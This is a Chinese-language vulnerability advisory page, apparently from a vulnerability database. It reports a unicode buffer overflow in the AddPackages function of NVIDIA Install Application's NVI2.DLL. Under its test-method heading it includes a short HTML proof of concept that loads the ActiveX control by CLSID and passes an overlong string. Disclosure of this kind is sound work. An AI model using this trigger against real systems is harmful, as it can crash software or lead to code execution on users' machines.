NVIDIA Install Application ‘AddPackages()’函数缓冲区溢出漏洞

日期: 2012/12/13 | 标签:nvidia | 游览：226

漏洞起因
边界条件错误
危险等级
低

影响系统
NVIDIA Install Application 2.1002.85.551

不受影响系统

危害
本地攻击者利用漏洞以应用程序上下文执行任意代码。

攻击所需条件
攻击者必须可访问NVIDIA Install Application所在系统。

漏洞信息
NVIDIA Install Application是一款NVIDIA安装产品的应用程序。
NVIDIA安装应用NVI2.DLL提供的’AddPackages’函数在处理’pDirectory’字符串时存在边界错误，允许攻击者注入超长数据数组触发unicode缓冲区溢出，可能以应用程序上下文执行任意代码。

测试方法
<html><body>
<object classid=’clsid:A9C8F210-55EB-4849-8807-EC49C5389A79′ id=’attack’ />
<script>
pDirectory=String(2068, “A”)
attack.AddPackages pDirectory
</script>
</body></html>

厂商解决方案
目前没有详细解决方案提供：
http://www.nvidia.com

漏洞提供者
Gjoko Krstic

← Red Hat Certificate System跨站脚本漏洞

WordPress Simple Gmail Login插件栈跟踪信息泄露漏洞 →

ZeroBox Vulnerability Database

坚持！我们将做的更好！

NVIDIA Install Application ‘AddPackages()’函数缓冲区溢出漏洞

评论关闭。